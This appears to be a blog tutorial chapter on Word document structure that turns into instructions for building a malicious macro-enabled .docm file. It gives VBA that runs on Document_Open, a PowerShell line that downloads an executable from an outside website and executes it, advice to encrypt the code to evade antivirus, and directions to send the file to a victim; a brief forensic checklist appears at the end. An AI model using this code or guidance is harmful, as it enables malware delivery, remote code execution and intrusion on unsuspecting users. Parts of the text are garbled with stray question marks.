Developing Ransomware Malware. 0x09
Writing Our Own Ransomware Malware for understand how the Cybercriminal write it.
Forensic Investigation - Micosoft Word Document. 0x04
In previous Chapters for Forensics we learnt :
?
In this chapter we will learn???
Lets rock ??
In today's world, we rely heavily on Microsoft's Word documents ??. It is the most used document format globally and is considered one of the most advanced file structures.
From a developer's perspective, it is very complex, yet it remains easy to use for the average user.
Word documents can integrate various elements such as voice, videos, AI-based voice dictation, images, flowcharts, and animations. Essentially, it has everything you need.
In our earlier chapter , We learned? that increased integration leads to greater file complexity.
Microsoft also aims to make Word documents compatible with programming languages like VC++ and VB to name a few. This allows these languages to create well-presented Word documents and integrate them with clients' customized applications.
Lets understand the file structure of the Microsoft Word Documents
Before we begin, ???? remember that Microsoft Word and Excel documents (.DOCX and .XLSX) are actually ZIP files. These ZIP files contain multiple “.xml“ files inside them.
Once the? “.docx”? is unzip, we can see the file structure. Below image shows the structure of the file. I have created a file called “qrc.docx”? ?which is a word document containing a simple phrase from sanskrit.??
The conatin of a normal Word Document :
The Sanskrit shloka font is? “Nirmala UI”, which is bold and the font size is 20, center aligned.?
The next two phrases font is “Roboto” size 15 , both aligned to center.?
Why am I telling you this? ???
Because this Font, Font Size, Text Alignment , Bold Text whatever we did in the word document? , is going to get recorded as it is, in the “.docx” file. When we will do a Forensic analysis of the file, we will know the metada of the word document e.g. Who created it , On what date it was modified by Whom etc.?
Once we understand the file system we can add malware which will get executed when the document is opened by the user. User need to allow “Enable Macro” for this??.
There are many companies, where the security level of browsers and document settings are not set. This is really concerning. They don't take computer security seriously. Anyway let's proceed.
Let's extract the word document with "7zip.exe"
The above Image shows that we have extracted the “qrc.docx” file with “7zip.exe” , one of the best unzippers on the market today. Who’s compression rate is very high for the big files and almost all well known files can be extracted with this, the “BEST TOOL” ??
Now lest understand the file structure and its file for forensic analysis and for writing malware too ??
qrc.docx File Structure
A .docx file is essentially a zip archive containing multiple XML files and directories that define the content and formatting of the document.
Let's look at a simplified structure with the provided content as an example:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="https://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
<Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/>
<!-- Additional overrides for other parts like fonts, settings, etc. -->
</Types>
2. _rels/.rels :
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="https://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="https://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
<!-- Other relationships -->
</Relationships>
3. word/document.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="https://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body>
<w:p>
<w:r>
<w:t>?????? ?? ???????? ?????? ????????? ????????????????????????????? ?????? ???? ???????</w:t>
</w:r>
</w:p>
<w:p>
<w:r>
<w:t>Union is indeed invincible. In union there is greater strength. In union there is a bond with friends. Union becomes power.</w:t>
</w:r>
</w:p>
<!-- More paragraphs as needed -->
</w:body>
</w:document>
4. word/styles.xml :
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:styles xmlns:w="https://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:style w:type="paragraph" w:default="1" w:styleId="Normal">
<w:name w:val="Normal"/>
<w:rPr>
<w:sz w:val="24"/> <!-- Font size -->
<!-- Other properties like font family, color, etc. -->
</w:rPr>
</w:style>
<!-- Other styles -->
</w:styles>
Important points :?
This is how our “qrc.docx” has been created by MS Word, from the outside it looks only for a single file, but internally it is linked to many files. We have written only text into it, that is why it has very few files . If we would have inserted Images , Voice data, flow charts etc. Then it would have added more files and tags. For simplicity and to understand the main part we will stick to the main tags and mail files, as Micorosft files are way complex, .The extension of our qrc.docs is “.docx” which is a non macro document which is safe to open in word.
领英推荐
Now lets create a Macro enabled document, which connects to our malicious website. The VBS code will download “calc.exe” from the website and once it downloads it will execute it, here we are downloading “calc.exe” , instead of this we can run our own trojan which we created in our earlier chapters ??.
Creating a macro word file , Below image show steps how to create a macro enabled file in Microsoft Word.
Once you do the above thing croctelly it will open a VBA editor, where you can write the Malicious encrypted code.
Once the codeing part is done, save the file as "demo_malware.docm"
The file extension should be ".docm" not ".docx" , If its's ".docx" , the macro will not run , pls note
Now our malware enable document is ready. We can send this to our victim. Once the document is open it will execute the trojan and open the required port, so the cybercriminal can connect it through its iRC chat command channel. Which we have seen earlier.?
The malicious VBS code :
Private Sub Document_Open()
Dim WshShell As Object
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "calc.exe"
End Sub
// this routine is not required
Sub runcalc()
Call Document_Open
End Sub
Be creative when writing the encryption code to hide the malicious code, otherwise, the antivirus software will detect it and the document won't open. Use this new command to download 'calc.exe' from an HTTPS website and run it.
This is again one of the most popular commands used by malware writers. To keep the command unnoticed from antivirus and IDS/IPS the malware writer always encrypts it. When they want to execute the script, they decrypt it dynamically? and then execute it, successfully
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "powershell.exe -Command ""Invoke-WebRequest -Uri 'https://www.aquasan.co.in/calc.exe' -OutFile 'C:\tmp\a\calc.exe'"""
WshShell.Run "c:\tmp\a\calc.exe”
Once the “demo_malware.docm” is created, let's open it in a MS Word, and as soon as you open it, we will get an alert message in the MS Word Application that says "Enable Macro". If we enable it , the VB script will get executed ??and our maclicous code will get executed.?
Below image show the alert message.
After enabling the macro the malicious macro script is run, below image show the clac.exe is executed, instead of this we would have run Trojan too.
Let's understand how it is getting executed.?
Microsoft Word has an internal API . The “Document_Open” event handler runs automatically as soon as the document is opened. This is because Document_Open is a predefined event in MS Word-VBA that triggers when the document is opened. There are many event like this for example :
Private Sub Document_Open()
MsgBox "Malware Executed !!! "
End Sub
Private Sub Document_Close()
MsgBox "Malware Executed !!! "
End Sub
Private Sub Document_New()
MsgBox "Malware Executed !!! "
End Sub
Private Sub Document_Save()
MsgBox "Malware Executed !!! "
End Sub
Private Sub Document_Change()
MsgBox "Malware Executed !!! "
End Sub
Private Sub Window_SelectionChange(ByVal Sel As Selection)
MsgBox "Malware Executed !!! "
End Sub
These are a few events where we can execute VBA code.??
So, In short whatever you want to execute e.g. Trojan script, use above Word event ??. For sure it is going to execute.?
Important file for forensic analysis, Check these files once you unzip the docx fileile?
- Embedded Objects: Look for any embedded objects that could be executables or scripts.
- Suspicious Content: Watch out for strange or hidden text that might contain malicious code.
- Hyperlinks: Check for links that could lead to dangerous websites.
- External Relationships: Look at links to external files or URLs that might download harmful content.
- OLE Object Relationships: Find and check any linked OLE objects.
- Embedded Files: Look for any files embedded in the document, like .exe or .js files.
- Macros: Check the VBA code for malicious scripts.
-Embedded Media: Look at images and media files for hidden data or steganography.
Microsoft Word, Excel and PowerPoint all support? VBscript .? Now you know how to integrate VBA script in Word and Excel. And execute trojan, by unzipping the files.???
In the next chapter we will try to? Hack ??or Brute force Password from PDF file and Microsoft Word and Excel File. Till then stay tuned .
Thanks a lot for your time ???
See then ???